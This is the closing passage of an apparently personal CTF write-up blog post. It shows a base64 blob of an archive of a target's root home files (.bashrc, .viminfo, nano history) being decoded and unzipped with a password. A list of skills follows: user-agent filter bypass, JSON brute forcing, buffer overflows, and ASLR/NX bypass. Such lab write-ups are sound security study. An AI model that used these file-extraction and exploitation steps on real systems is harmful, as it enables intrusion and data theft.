wAGAAAAAAAAQAAAKSBAgMAAHJvb3QvLmJhc2hyY1VUBQADqRkpVnV4CwABBAAAAAAEAAAAAFBLAQIeAxQACQAIAMIBO0v8o724oQEAAHkDAAANABgAAAAAAAAAAACAgfMIAAByb290Ly52aW1pbmZvVVQFAAM738pZdXgLAAEEAAAAAAQAAAAAUEsBAh4DCgAAAAAAmIAjSwAAAAAAAAAAAAAAAAsAGAAAAAAAAAAQAO1B6woAAHJvb3QvLm5hbm8vVVQFAAMQGqxZdXgLAAEEAAAAAAQAAAAAUEsBAh4DCgAJAAAAxko7S9ntHzwTAAAABwAAABkAGAAAAAAAAQAAAICBMAsAAHJvb3QvLm5hbm8vc2VhcmNoX2hpc3RvcnlVVAUAA7Nfy1l1eAsAAQQAAAAABAAAAABQSwUGAAAAAAoACgBWAwAApgsAAAAA" | base64 -d > root.zip

1
2

unzip root.zip
password: magicword

Skills Learned

  • Bypassing user agent filtering
  • Brute forcing JSON payloads
  • Exploiting buffer overflows
  • Bypassing ASLR and NX
Hong Woo
WRITTEN BY
Hong
📚Cybersecurity Student🚩CTF Player☁️Cloud Computing

See Also

©2023, All Rights Reserved